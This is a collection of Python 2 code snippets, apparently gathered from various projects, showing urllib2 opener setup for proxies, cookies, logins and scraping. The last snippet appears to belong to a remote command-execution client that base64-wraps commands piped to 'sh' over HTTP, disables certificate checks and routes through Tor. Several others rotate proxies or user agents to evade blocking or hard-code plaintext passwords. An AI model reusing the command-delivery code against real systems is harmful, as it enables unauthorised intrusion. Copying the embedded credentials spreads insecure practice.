Example #1
def proxier(pip):
	try:
		testsite2 = "http://%s" % (testsite)
		proxy_handler = urllib2.ProxyHandler({'http': pip})
		opener = urllib2.build_opener(proxy_handler)
		opener.addheaders = [('User-agent', 'Mozilla/5.0')]
		urllib2.install_opener(opener)
		req=urllib2.Request(testsite2)
		sock=urllib2.urlopen(req)

		connect = httplib.HTTPConnection(testsite)
		connect.request("HEAD", "/")
		r1 = connect.getresponse()
		if r1.reason == "OK":
			print "%s works - Added to %s" % (pip, filename)

			try:
				file = open(filename, 'a')
				file.write("%s" % (pip))
				file.close()
			except IOError:
				print "Could not append to file!"

	except urllib2.HTTPError as e:
		print 'Error code: ', e.code
		return e.code
	except Exception as detail:
		print "Error: Timeout"
		return False		
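A minimal driver for the checker above might look like the sketch below; it assumes the module-level globals testsite and filename that proxier() relies on, and the candidate proxy addresses are placeholders.

# Hypothetical driver for proxier(); 'testsite' and 'filename' are the globals
# the function above expects, and the candidate proxies are placeholders.
import urllib2, httplib

testsite = "www.example.com"
filename = "working_proxies.txt"

for pip in ["1.2.3.4:8080", "5.6.7.8:3128"]:
    proxier(pip)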
Example #2
File: utils.py Project: cmcc/boto
def fetch_file(uri, file=None, username=None, password=None):
    """
    Fetch a file based on the URI provided. If you do not pass in a file pointer,
    a tempfile.NamedTemporaryFile is returned, or None if the file could not be
    retrieved.
    The URI can be either an HTTP url, or "s3://bucket_name/key_name"
    """
    boto.log.info('Fetching %s' % uri)
    if file == None:
        file = tempfile.NamedTemporaryFile()
    try:
        if uri.startswith('s3://'):
            bucket_name, key_name = uri[len('s3://'):].split('/', 1)
            c = boto.connect_s3(aws_access_key_id=username, aws_secret_access_key=password)
            bucket = c.get_bucket(bucket_name)
            key = bucket.get_key(key_name)
            key.get_contents_to_file(file)
        else:
            if username and password:
                passman = urllib2.HTTPPasswordMgrWithDefaultRealm()
                passman.add_password(None, uri, username, password)
                authhandler = urllib2.HTTPBasicAuthHandler(passman)
                opener = urllib2.build_opener(authhandler)
                urllib2.install_opener(opener)
            s = urllib2.urlopen(uri)
            file.write(s.read())
        file.seek(0)
    except:
        boto.log.exception('Problem Retrieving file: %s' % uri)
        file = None
    return file
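Typical calls to fetch_file, sketched with placeholder credentials and URIs:

# Sketch: fetch an S3 object and a plain HTTP resource with the helper above.
# Bucket, key and credentials are placeholders.
fp = fetch_file('s3://my-bucket/path/to/key',
                username='AKIAEXAMPLE',   # AWS access key id (placeholder)
                password='secretkey')     # AWS secret key (placeholder)
if fp is not None:
    data = fp.read()

fp = fetch_file('http://example.com/bootstrap.cfg')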
Example #3
    def run(self):
	try:
		cj = cookielib.LWPCookieJar()
		opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
		urllib2.install_opener(opener)

		req = urllib2.Request(self.url)
		operate = opener.open(req)
		html = operate.read()

		print r'handling ', self.urlid

		m = re.findall(r'>.*?</a></b></span>', html)

		if len(m) != 0:
			
			file_save = open(r'F://temp/3/'+self.urlid[:-1]+'.txt','a')

			file_save.write('ProductId:' + self.urlid)
			for i in m:
				j = i[1:-15].split('>')
				file_save.write(j[-1]+'\n')
			file_save.close()
		
		time.sleep(0.2)
		
	except:
		print "no"
Example #4
def findMovieReviewers(movie_id, subUrl) :	
	print movie_id
	print subUrl
	reload(sys)
	sys.setdefaultencoding('utf-8')
	
	cj = cookielib.LWPCookieJar() 
	try: 
		cj.revert('douban.cookie') 
	except: 
		try :
			dou=douban() 
			username='******' 
			password='******' 
			domain='http://www.douban.com/' 
			origURL='http://www.douban.com/login' 
			dou.setinfo(username,password,domain,origURL) 
			dou.signin()  
		except : 
			return
	opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj)) 
	urllib2.install_opener(opener) 
	collectPage = urllib2.urlopen("http://movie.douban.com/subject/" + movie_id + "/reviews" + subUrl, timeout=20).read().encode('utf-8')
	soup = BeautifulSoup(collectPage, 'html.parser')

	#init db connection
	conn = MySQLdb.connect(host='localhost',user='******',passwd='root')
	curs = conn.cursor()
	conn.select_db('pydb')

	reviewsOfThisPage = soup.findAll("a", { "class" : "review-hd-avatar" })

	countReviews = len(reviewsOfThisPage)
	print countReviews

	for review in reviewsOfThisPage :
		reviewSoup = BeautifulSoup(str(review), 'html.parser')
		userId = reviewSoup.a["href"].split("/")[4]
		try :
			#insert data into db rowbyrow
			curs.execute('INSERT INTO users (user_id) VALUES (%s)', userId)
			print "rows affected " + str(curs.rowcount)
		except :
			print "error inserting, probably duplicate for userid : " + userId

	try :
		foundSubUrl = soup.find("a", { "class" : "next" })['href']
	except :
		foundSubUrl = ""

	print foundSubUrl

	conn.commit()
	curs.close()
	conn.close()	

	if "" != foundSubUrl  and countReviews > 0 :
		time.sleep( 2 )
		findMovieReviewers(movie_id, foundSubUrl)
Example #5
    def save(self):
        # TODO: new IP address should be added in a side-by-side manner
        # or the interface wouldn't appear once IP was changed.
        retval = super(GlobalConfigurationForm, self).save()

        whattoreload = "hostname"
        if self.instance._orig_gc_ipv4gateway != self.cleaned_data.get('gc_ipv4gateway'):
            whattoreload = "networkgeneral"
        if self.instance._orig_gc_ipv6gateway != self.cleaned_data.get('gc_ipv6gateway'):
            whattoreload = "networkgeneral"
        notifier().reload(whattoreload)

        http_proxy = self.cleaned_data.get('gc_httpproxy')
        if http_proxy:
            os.environ['http_proxy'] = http_proxy
            os.environ['https_proxy'] = http_proxy
        elif not http_proxy:
            if 'http_proxy' in os.environ:
                del os.environ['http_proxy']
            if 'https_proxy' in os.environ:
                del os.environ['https_proxy']

        # Reset global opener so ProxyHandler can be recalculated
        urllib2.install_opener(None)

        return retval
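The install_opener(None) call works because urllib2 caches its default opener, and the ProxyHandler inside that opener reads os.environ only when the opener is built; a minimal sketch of the effect (the proxy URL is a placeholder):

# Sketch: dropping the cached opener forces urllib2 to rebuild it, so the new
# http_proxy/https_proxy environment values are picked up.
import os
import urllib2

os.environ['http_proxy'] = 'http://proxy.example.com:3128'
urllib2.install_opener(None)            # discard the cached default opener
urllib2.urlopen('http://example.com/')  # next call rebuilds it with the proxy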
Example #6
 def __init__(self, cookie_filename=None):
     self.cj = cookielib.LWPCookieJar()
     if cookie_filename is not None:
         self.cj.load(cookie_filename)
     self.cookie_processor = urllib2.HTTPCookieProcessor(self.cj)
     self.opener = urllib2.build_opener(self.cookie_processor, urllib2.HTTPHandler)
     urllib2.install_opener(self.opener)
Example #7
def query(searchstr, outformat, allresults=False):
    """Return a list of bibtex items."""
    logging.debug("Query: %s" % searchstr)
    searchstr = "/scholar?q=" + urllib2.quote(searchstr)
    url = GOOGLE_SCHOLAR_URL + searchstr
    header = HEADERS
    header["Cookie"] = header["Cookie"] + ":CF=%d" % outformat
    for proxy_addr in proxy_list:
        try:
            proxy = urllib2.ProxyHandler({"http": proxy_addr})
            opener = urllib2.build_opener(proxy)
            urllib2.install_opener(opener)
            request = urllib2.Request(url, headers=header)
            response = urllib2.urlopen(request, timeout=5)
            print "Success HTTP-Agent:" + proxy_addr
            break
        except urllib2.URLError, e:
            if hasattr(e, "code"):
                print str(e.code) + e.msg + proxy_addr
                if e.code == 403 or e.code == 503:
                    proxy_list.remove(proxy_addr)
            elif e.reason.message == "timed out":
                print "Timed Out" + proxy_addr
                proxy_list.remove(proxy_addr)
            continue
Example #8
def play_fourshared(url, name):
	global media_id
	xbmc.log("starting 4shared method with: %s and %s" % (name, url))
	username = '******'
	password = '******'
	cookie_file = os.path.join(__profilepath__, 'pktemp.cookies')
	media_file = os.path.join(__profilepath__, ("pktemp%d.mp3" % (media_id)))
	cj = cookielib.LWPCookieJar()
	media_id = media_id + 1

	opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
	loginurl = 'https://www.4shared.com/login?login=%s&password=%s' % (username, password)
	xbmc.log("logging in to 4shared: " + loginurl)
	resp = opener.open(loginurl)

	cj.save(cookie_file, ignore_discard=True)
	cj.load(cookie_file, ignore_discard=True)

	opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
	urllib2.install_opener(opener)

	usock = opener.open(url)
	data = usock.read()
	#media_file = usock.geturl()
	usock.close()

	fp = open(media_file, 'wb')
	fp.write(data)
	fp.close()

	#play_stream(media_file, name)
	print "playing stream name: " + str(name) + " url: " + str(media_file)
	listitem = xbmcgui.ListItem( label = str(name), iconImage = "DefaultVideo.png", thumbnailImage = xbmc.getInfoImage( "ListItem.Thumb" ), path=media_file )
	listitem.setInfo( type="Music", infoLabels={ "Title": name } )
	xbmc.Player( xbmc.PLAYER_CORE_DVDPLAYER ).play( str(media_file), listitem)
Example #9
    def __init__(self, username, realm_id, config, debug=False):
        self._version = QAPI_VERSION
        self._cookiejar = CookieJar()
        self._username = username
        self._realm_id = realm_id
        self._profile = '@'.join((username, realm_id))
        self._realm = REALMS[self._realm_id]
        self._proxy = None
        self._templates = None
        self._debug = debug
        self._config = None #. User configuration file for scripted mode
        self._connected = False
        self._username = '******'
        self._cFM = None
        try:
            from ConfigFileManager import ConfigFileManager, InternalConfigError
            try:
                self._config = ConfigFileManager(config)
                self._qapi_ini = self._config.option('qapi', 'ini')
                self._cFM = ConfigFileManager(self._qapi_ini)
            except InternalConfigError as e:
                raise Exception("Sorry, %s" % e)
        except ImportError as e:
            raise Exception("Sorry, %s" % e)

        urllib2.install_opener(self._opener())
Example #10
 def check_proxy(self, specific={}):
     """ Checks if proxy settings are set on the OS
     Returns:
     -- 1 when direct connection works fine
     -- 2 when direct connection fails and no proxy is set in the OS
     -- 3 and settings when direct connection fails but a proxy is set
     see: https://docs.python.org/2/library/urllib.html#urllib.getproxies
     """
     os_proxies = getproxies()
     if len(os_proxies) == 0 and self.check_internet_connection:
         logging.info("No proxy needed nor set. Direct connection works.")
         return 1
     elif len(os_proxies) == 0 and not self.check_internet_connection:
         logging.error("Proxy not set in the OS. Needs to be specified")
         return 2
     else:
         #
         env['http_proxy'] = os_proxies.get("http")
         env['https_proxy'] = os_proxies.get("https")
         #
         proxy = ProxyHandler({
                              'http': os_proxies.get("http"),
                              'https': os_proxies.get("https")
                              })
         opener = build_opener(proxy)
         install_opener(opener)
         urlopen('http://www.google.com')
         return 3, os_proxies
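A hedged sketch of how the return codes documented above might be consumed (the client name is hypothetical):

# Hypothetical caller of check_proxy(); 1 and 2 are plain ints, while 3 arrives
# together with the OS proxy dictionary.
status = client.check_proxy()
if status == 1:
    pass                                  # direct connection works
elif status == 2:
    raise RuntimeError("no proxy configured and direct connection failed")
else:
    code, os_proxies = status             # (3, {'http': ..., 'https': ...})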
Example #11
    def openurl(self, url):
        """
        Open the web page
        """
        cookie_support= urllib2.HTTPCookieProcessor(cookielib.CookieJar())
        self.opener = urllib2.build_opener(cookie_support, urllib2.HTTPHandler)
        urllib2.install_opener(self.opener)
        user_agents = [
                    'Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11',
                    'Opera/9.25 (Windows NT 5.1; U; en)',
                    'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)',
                    'Mozilla/5.0 (compatible; Konqueror/3.5; Linux) KHTML/3.5.5 (like Gecko) (Kubuntu)',
                    'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.12) Gecko/20070731 Ubuntu/dapper-security Firefox/1.5.0.12',
                    'Lynx/2.8.5rel.1 libwww-FM/2.14 SSL-MM/1.4.1 GNUTLS/1.2.9',
                    "Mozilla/5.0 (X11; Linux i686) AppleWebKit/535.7 (KHTML, like Gecko) Ubuntu/11.04 Chromium/16.0.912.77 Chrome/16.0.912.77 Safari/535.7",
                    "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:10.0) Gecko/20100101 Firefox/10.0 ",

                    ]

        agent = random.choice(user_agents)
        self.opener.addheaders = [("User-agent",agent),
                                  ("Accept","*/*"),
                                  ('Referer', 'http://www.google.com')
        ]
        try:
            res = self.opener.open(url)
            return res.read()
        except:
            return None
Example #12
def Weibo(USERID, PASSWD):
    client = APIClient(app_key=APP_KEY, app_secret=APP_SECRET, redirect_uri=CALLBACK_URL)
    referer_url = client.get_authorize_url()
    #print "referer url is : %s" % referer_url

    cookies = urllib2.HTTPCookieProcessor()
    opener = urllib2.build_opener(cookies)
    urllib2.install_opener(opener)
 
    postdata = {"client_id": APP_KEY,
                "redirect_uri": CALLBACK_URL,
                "userId": USERID,
                "passwd": PASSWD,
                "isLoginSina": "0",
                "action": "submit",
                "response_type": "code",
             }
 
    headers = {"User-Agent": "Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0",
               "Host": "api.weibo.com",
               "Referer": referer_url
             }
 
    req  = urllib2.Request(url = AUTH_URL,
                           data = urllib.urlencode(postdata),
                           headers = headers
                    )
    try:
        resp = urllib2.urlopen(req)
        #print "callback url is : %s" % resp.geturl()
        code = resp.geturl()[-32:]
    except APIError, e:
        print e
Example #13
    def _login(self):
        """
        Authenticates a user in a bugzilla tracker
        """
        if not (self.backend_user and self.backend_password):
            printdbg("No account data provided. Not logged in bugzilla")
            return

        import cookielib

        cookie_j = cookielib.CookieJar()
        cookie_h = urllib2.HTTPCookieProcessor(cookie_j)

        url = self._get_login_url(self.url)
        values = {'Bugzilla_login': self.backend_user,
                  'Bugzilla_password': self.backend_password}

        opener = urllib2.build_opener(cookie_h)
        urllib2.install_opener(opener)
        data = urllib.urlencode(values)
        request = urllib2.Request(url, data)
        urllib2.urlopen(request)
        for i, c in enumerate(cookie_j):
            self.cookies[c.name] = c.value

        printout("Logged in bugzilla as %s" % self.backend_user)
        printdbg("Bugzilla session cookies: %s" % self.cookies)
Example #14
	def getResponseMixedData(self, url, secureToken, dic, additionalOptions=None):
		"Method sets up a REST call with mixed body data such as multipart/form-data."
		
		# check whether proxy is given
		if "proxy" in globals():
			proxy_handler = urllib2.ProxyHandler(self.config.proxy)
			opener = urllib2.build_opener(proxy_handler)
			urllib2.install_opener(opener)
				
		multipart = urllib2.build_opener(MultipartPostHandler.MultipartPostHandler)
		urllib2.install_opener(multipart)
		
		req = urllib2.Request(url, dic.parameters())

		req.add_header('Authorization', self.config.SDK_AUTH+",oauth_token=\""+secureToken+"\"")
		req.add_header('User-Agent', self.config.SDK_VERSION)
		req.add_header('Accept', 'application/json')
		
		# sets additional header fields
		if additionalOptions != None:
			for key in additionalOptions:
				req.add_header(key, additionalOptions[key])
		
		try:
			response = urllib2.urlopen(req)
			
			response = json.loads(response.read())	
			
			return response
		
		except urllib2.HTTPError as e:
			
			raise TelekomException(json.loads(e.read()))
Example #15
	def getResponseJSONData(self, url, secureToken, jsonString, additionalOptions=None):
		"Method sends a JSON encoded string via REST"
		
		if "proxy" in globals(): # set proxy if necessary
			proxy_handler = urllib2.ProxyHandler(self.config.proxy)
			opener = urllib2.build_opener(proxy_handler)
			urllib2.install_opener(opener)
		
		req = urllib2.Request(url, jsonString)
			
		# define header fields	
		req.add_header('Authorization', self.config.SDK_AUTH+",oauth_token=\""+secureToken+"\"")
		req.add_header('User-Agent', self.config.SDK_VERSION)
		req.add_header('Accept', 'application/json')
		req.add_header('Content-Type', 'application/json')
		#req.add_header('Content-Length', len(json))
		
		# establish call
		try:
			response = urllib2.urlopen(req)
			response = json.loads(response.read())
			
			return response
		
		except urllib2.HTTPError as e: # catch other status codes than '0000' and raise a new TelekomException containing 'statusCode' and 'statusMessage'
			
			raise TelekomException(json.loads(e.read()))
Example #16
    def setCookie(self, account = ''):
        self.cookieJarInMemory = cookielib.LWPCookieJar()
        if account == '':
            Var = self.cursor.execute("select cookieStr, recordDate from LoginRecord order by recordDate desc").fetchone()
        else:
            Var = self.cursor.execute("select cookieStr, recordDate from LoginRecord order by recordDate desc where account = `{}`".format(account)).fetchone()

        cookieStr = Var[0]
        self.loadCookJar(cookieStr)
        
        cookieStr = ''
        for cookie in self.cookieJarInMemory:
            cookieStr += cookie.name + '=' + cookie.value + ';'
        self.extraHeader = {
                'User-Agent':    'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:34.0) Gecko/20100101 Firefox/34.0',
                'Referer':    'www.zhihu.com/',
                'Host':   'www.zhihu.com',
                'DNT':    '1',
                'Connection': 'keep-alive',
                'Cache-Control':  'max-age=0',
                'Accept-Language':    'zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3',
                # 'Accept-Encoding':    'gzip, deflate',  (seems unnecessary)
                'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
        }
        self.opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(self.cookieJarInMemory))
        urllib2.install_opener(self.opener)
        return 
Example #17
 def run(self):
     global proxyLists
     global proxyCheckedLists
     while proxyLists:
         proxyLock.acquire()  # acquire the lock
         proxyList = proxyLists.pop() # pop one proxy IP entry
         proxyLock.release()
         
         cookie = urllib2.HTTPCookieProcessor()  # enable cookie handling
         proxyHandle = urllib2.ProxyHandler({"http" : r"http://%s:%s" % (proxyList[0], proxyList[1])})
         opener = urllib2.build_opener(cookie, proxyHandle)
         opener.addheaders = [("User-Agent", "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.102 Safari/537.36")]
         urllib2.install_opener(opener)
         t1 = time.time()
         try:
             req = urllib2.urlopen(self.test_url, timeout=self.timeout)
             result = req.read()
             pos = result.find(self.test_str)
             timeused = time.time() - t1
             proxyList.append(timeused)
             if pos > 1:
                 proxyLock.acquire()
                 proxyCheckedLists.append(proxyList)
                 proxyLock.release() 
         except Exception,e:
             continue
Example #18
    def __init__(self, ticker_list, proxy=None):

        if proxy:
            
            proxy_support = urllib2.ProxyHandler(proxy)
            opener = urllib2.build_opener(proxy_support)
            urllib2.install_opener(opener)
        
        tickers = '%22%2C%22'.join(ticker_list).upper()
        
        url = 'http://query.yahooapis.com/v1/public/yql?q=select%20*%20from%20yahoo.finance.quotes%20where%20symbol%20in%20(%22'+tickers+'%22)&format=json&env=store%3A%2F%2Fdatatables.org%2Falltableswithkeys&callback='
        req = urllib2.Request(url)

        try:
            response = urllib2.urlopen(req)
            
        except urllib2.URLError, e:

            if hasattr(e, 'reason'):
                print 'We failed to reach a server with reason:', e.reason
                print 'The URL passed was:', url
                print 'The tickers passed were:', tickers
                print 'The response from Yahoo was:', e.read()
                print
            elif hasattr(e, 'code'):
                print 'The server couldn\'t fulfill the request with error code:', e.code
                print 'The URL passed was:', url
                print 'The tickers passed were:', tickers
                print 'The response from Yahoo was:', e.read()
                print
Example #19
 def __init__(self):
     self.cj = cookielib.CookieJar()
     self.handlers = [poster.streaminghttp.StreamingHTTPHandler(),
                      poster.streaminghttp.StreamingHTTPRedirectHandler(),
                      urllib2.HTTPCookieProcessor(self.cj)]
     self.opener = urllib2.build_opener(*self.handlers)
     urllib2.install_opener(self.opener)
Example #20
    def urlcontent(self, url, para=None, header={}):
        """
        获取地址的源代码
        url 要获取的网址
        header 头部设置
            """
        print "start get url:%s" % url
        if self.auto_sleep:
            sleep_time = random.random()*2
            time.sleep(sleep_time)

        # Set the proxy (http and https only)
        if self.proxy:
            opener = urllib2.build_opener(urllib2.ProxyHandler({'http': self.proxy, 'https' : self.proxy}) )
            urllib2.install_opener(opener)
        # Build the POST parameters
        params = None
        if para:
            params = urllib.urlencode(para)
        # Create the request
        request = urllib2.Request(url, params, header)
        try:
            # Send the request
            response = urllib2.urlopen(request)
            content = response.read()
            # Apply the configured encoding
            if self.charset:
                content = content.encode(self.charset)
            return content
        except:
            print 'get url content failed:', url
            return None
Example #21
def loginWillowTV(url):
        try:
                print url
                opener = urllib2.build_opener(cookiejar)
                urllib2.install_opener(opener)
                email = wtv.getSetting('email')
                pwd = wtv.getSetting('password')
                values = {'Email': email,'Password': pwd, 'KeepSigned': 'true', 'LoginFormSubmit': 'true'}
                headers = { 'User-Agent' : 'Mozilla/5.0 (iPad; CPU OS 5_0 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile/9A334 Safari/7534.48.3' }
                data = urllib.urlencode(values)
                req = urllib2.Request(url, data, headers)
                response = urllib2.urlopen(req)
                link=response.read()
                response.close()
                web = ''.join(link.splitlines()).replace('\t','').replace('\'','"')
                match=re.compile('Your email or password is incorrect').findall(web)
                if(len(match)>0):
                        d = xbmcgui.Dialog()
                        d.ok('Login Failed', 'Error: Your email or password is incorrect.','Please verify your login details.')
                        return False
                else:
                        loginSuccess =  True
                        return True
        except:
                d = xbmcgui.Dialog()
                d.ok('LOGIN Failed', 'Its not your fault. BREAK TIME!','Please go out of Willow TV and try again.')
                return False
Example #22
def fx_opener(request):
    request.addfinalizer(
        functools.partial(setattr, urllib2, '_opener', urllib2._opener)
    )
    opener = urllib2.build_opener(TestHTTPHandler)
    urllib2.install_opener(opener)
    return opener
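fx_opener is a pytest fixture: it installs a stub opener and registers a finalizer that restores urllib2's private _opener attribute afterwards. A hedged sketch of a test built on it (the URL is a placeholder expected to be served by TestHTTPHandler):

# Hypothetical test; pytest injects fx_opener, and the finalizer above puts
# urllib2._opener back after the test finishes.
def test_fetch_goes_through_stub(fx_opener):
    response = urllib2.urlopen('http://stub.example/resource')
    assert response is not None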
Example #23
    def _opener(self):

        build = [urllib2.HTTPHandler()]

        if self.request.redirect:
            build.append(urllib2.HTTPRedirectHandler())

        if self.request.proxy_host and self.request.proxy_port:
            build.append(urllib2.ProxyHandler(
                {self.request.proxy_protocol: self.request.proxy_host + ':' + str(self.request.proxy_port)}))

            if self.request.proxy_username:
                proxy_auth_handler = urllib2.ProxyBasicAuthHandler()
                proxy_auth_handler.add_password('realm', 'uri', self.request.proxy_username,
                                                self.request.proxy_password)
                build.append(proxy_auth_handler)

        if self.request.cookies:
            self.request.cookies = os.path.join(self._dirname, self.request.cookies)
            self.cookies = cookielib.MozillaCookieJar()
            if os.path.isfile(self.request.cookies):
                self.cookies.load(self.request.cookies)
            build.append(urllib2.HTTPCookieProcessor(self.cookies))

        urllib2.install_opener(urllib2.build_opener(*build))
Example #24
def fetch_data_from_url(url):
  """Downloads and returns data from a url"""
  request = urllib2.Request(url)
  opener = urllib2.build_opener()
  urllib2.install_opener(opener)
  data = opener.open(request).read()
  return data
Example #25
    def _connect(self, request):
        """ Connect to the secured database by opening the request.

        Required:
        urllib2.Request     request     The URL Request.

        Return:
        str                 serialized_response     response data

        """
        # create a password manager
        password_mgr = urllib2.HTTPPasswordMgrWithDefaultRealm()

        # Add the username and password.
        # If we knew the realm, we could use it instead of None.
        password_mgr.add_password(
                None,
                self.base_url(),
                self._username,
                self._password)

        handler = urllib2.HTTPBasicAuthHandler(password_mgr)

        # create "opener" (OpenerDirector instance)
        opener = urllib2.build_opener(handler)

        # Install the opener.
        # Now all calls to urllib2.urlopen use our opener.
        urllib2.install_opener(opener)

        serialized_response = urllib2.urlopen(request).read()

        return serialized_response
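Installing the opener makes these credentials global to every later urllib2.urlopen call; when that is not wanted, the same handler can be used through a local opener, as in this sketch (URL and credentials are placeholders):

# Sketch: same basic-auth handler, kept local instead of installed globally.
password_mgr = urllib2.HTTPPasswordMgrWithDefaultRealm()
password_mgr.add_password(None, 'http://db.example.com/', 'user', 'secret')
opener = urllib2.build_opener(urllib2.HTTPBasicAuthHandler(password_mgr))
serialized_response = opener.open('http://db.example.com/query').read()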
Example #26
def login_website():
    '''51cto'''
    proxy_support = urllib2.ProxyHandler({'http':'127.0.0.1:8086'})

    cook_jar=cookielib.CookieJar()
    cookie_support=urllib2.HTTPCookieProcessor(cook_jar)
    opener=urllib2.build_opener(proxy_support,cookie_support,urllib2.HTTPHandler)
    urllib2.install_opener(opener)
    print 'logging'
    login_url='http://home.51cto.com/index.php?s=/Index/doLogin'
    user_agents = ['Mozilla/5.0 (Windows NT 5.1; rv:13.0) Gecko/20100101 Firefox/13.0.1',]
    post_data=urllib.urlencode({'email':'*****@*****.**',
                               'passwd':'123456a',
                               'autologin':'******',
                               'reback':'http%3A%2F%2Fwww.51cto.com%2F',
                               'button.x':36,
                               'button.y':17,
                               })
    headers={
            'User-Agent':user_agents[0],
            'Referer':'http://home.51cto.com/index.php?s=/Index/index/reback/http%253A%252F%252Fwww.51cto.com%252F/'
            }
    req=urllib2.Request(url=login_url,data=post_data,headers=headers)
    res = urllib2.urlopen(req)
    print 'code is :'+str(res.code)
    if res.code<=200:
        print 'login success' 
    else:
        print 'login fail'
    print cook_jar._cookies
    
    login_after_action(res)
    
    return res
Example #27
def login_website():
    '''csdn'''
    cook_jar=cookielib.CookieJar()
    cookie_support=urllib2.HTTPCookieProcessor(cook_jar)
    opener=urllib2.build_opener(cookie_support,urllib2.HTTPHandler)
    urllib2.install_opener(opener)
    print 'logging'
    
    login_url='http://passport.csdn.net/ajax/accounthandler.ashx?t=log&u=dylinshi&p=123456a&remember=0&f=http%3A%2F%2Fblog.csdn.net%2F&rand=0.363029723724382'
    user_agents = [
            'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6',
            'Opera/9.25 (Windows NT 5.1; U; en)',
            'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)',
            'Mozilla/5.0 (compatible; Konqueror/3.5; Linux) KHTML/3.5.5 (like Gecko) (Kubuntu)',
            'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.12) Gecko/20070731 Ubuntu/dapper-security Firefox/1.5.0.12',
            'Lynx/2.8.5rel.1 libwww-FM/2.14 SSL-MM/1.4.1 GNUTLS/1.2.9'
            ]
    headers={
            'User-Agent':user_agents[0],
            'Referer':settings.S_start_urls[0]
            }
    req=urllib2.Request(url=login_url,headers=headers)
    res = urllib2.urlopen(req)
    
    print 'code is :'+str(res.code)
    if res.code<=200:
        print 'login %s success'%settings.S_target_website
    else:
        print 'login %s fail'%settings.S_target_website
        print cook_jar._cookies
    return res
Example #28
 def __init__(self, login, password, hostname, port=8091):
     self.passman = urllib2.HTTPPasswordMgrWithDefaultRealm()
     self.passman.add_password(None, "http://%s:%d/" % (hostname, int(port)), login, password)
     self.hostname = hostname
     self.port = port
     self.opener = urllib2.build_opener(urllib2.HTTPBasicAuthHandler(self.passman))
     urllib2.install_opener(self.opener)
Example #29
    def get_current_sequence(self):
        """get the current sequence from the paylist"""
        url = self.get_sequence_url()
        header = self.get_header()

        req = urllib2.Request(url, None, header)
        opener = urllib2.build_opener()
        opener.add_handler(urllib2.HTTPCookieProcessor(self.get_cookie()))
        try:
            opener.add_handler(self.get_proxy())
        except:
            log.warning('can not add proxy')

        urllib2.install_opener(opener)

        try:
            response = urllib2.urlopen(req, timeout=10)
            stream = response.read()
        except:
            return 0

        try:
            for line in stream.split('\n'):
                if line.startswith('#EXT-X-MEDIA-SEQUENCE'):
                    return line.split(':')[1]
        except:
            return 0
Example #30
 def __init__(self, url, close=True, proxy=None, post=None, mobile=False, referer=None, cookie=None, output='', timeout='10'):
     if not proxy is None:
         proxy_handler = urllib2.ProxyHandler({'http':'%s' % (proxy)})
         opener = urllib2.build_opener(proxy_handler, urllib2.HTTPHandler)
         opener = urllib2.install_opener(opener)
     if output == 'cookie' or not close == True:
         import cookielib
         cookie_handler = urllib2.HTTPCookieProcessor(cookielib.LWPCookieJar())
         opener = urllib2.build_opener(cookie_handler, urllib2.HTTPBasicAuthHandler(), urllib2.HTTPHandler())
         opener = urllib2.install_opener(opener)
     if not post is None:
         request = urllib2.Request(url, post)
     else:
         request = urllib2.Request(url,None)
     if mobile == True:
         request.add_header('User-Agent', 'Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_0 like Mac OS X; en-us) AppleWebKit/532.9 (KHTML, like Gecko) Version/4.0.5 Mobile/8A293 Safari/6531.22.7')
     else:
         request.add_header('User-Agent', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0) Gecko/20100101 Firefox/6.0')
     if not referer is None:
         request.add_header('Referer', referer)
     if not cookie is None:
         request.add_header('cookie', cookie)
     response = urllib2.urlopen(request, timeout=int(timeout))
     if output == 'cookie':
         result = str(response.headers.get('Set-Cookie'))
     elif output == 'geturl':
         result = response.geturl()
     else:
         result = response.read()
     if close == True:
         response.close()
     self.result = result
Example #31
    def get_page_source(self, cmd):
        self.cmd = cmd
        if self.shouldIuseB64:
            self.cmd = "echo %s | base64 -d | sh" % self.cmd.encode(
                'base64').replace('\n', '')
        result = re.search(';sudo ', self.cmd)
        if result:
            command = self.cmd.replace(
                'sudo', '{0}sudo{1}'.format('\033[91m', '\033[93m'))
            errmsg = colored(
                '\n[!] Warning this command ({0}) could break the connection. I\'m not going to allow it to be sent'
                .format(command), 'red')
            cprint(errmsg, 'red')

        elif getargs.url:
            try:
                _create_unverified_https_context = ssl._create_unverified_context
            except AttributeError:
                # Legacy Python that doesn't verify HTTPS certificates by default
                pass
            else:
                # Handle target environment that doesn't support HTTPS verification
                ssl._create_default_https_context = _create_unverified_https_context

            # Proxy support
            proxy_support = ProxyHandler(
                {'http': self.proxy} if self.proxy else {})
            opener = build_opener(proxy_support, HTTPHandler(debuglevel=0))
            opener.addheaders = [
                ('Accept', '*/*'),
            ]
            if getargs.headers:
                # print opener.addheaders
                # print getargs.headers
                opener.addheaders.extend(getargs.headers)
            # Tor support
            if self.tor:
                opener = build_opener(
                    SocksiPyHandler(PROXY_TYPE_SOCKS5, '127.0.0.1', 9050))
                # print opener.open('http://ifconfig.me/ip').read()
                # exit()

            # User agent
            if getargs.random_agent:
                opener.addheaders.extend([('User-agent', self.random_agent)])
            elif self.user_agent:
                opener.addheaders.extend([('User-agent', self.user_agent)])
            else:
                pass

            install_opener(opener)

            errmsg = colored(
                '\n[!] Check your network connection and/or the proxy (if you\'re using one)',
                'red')

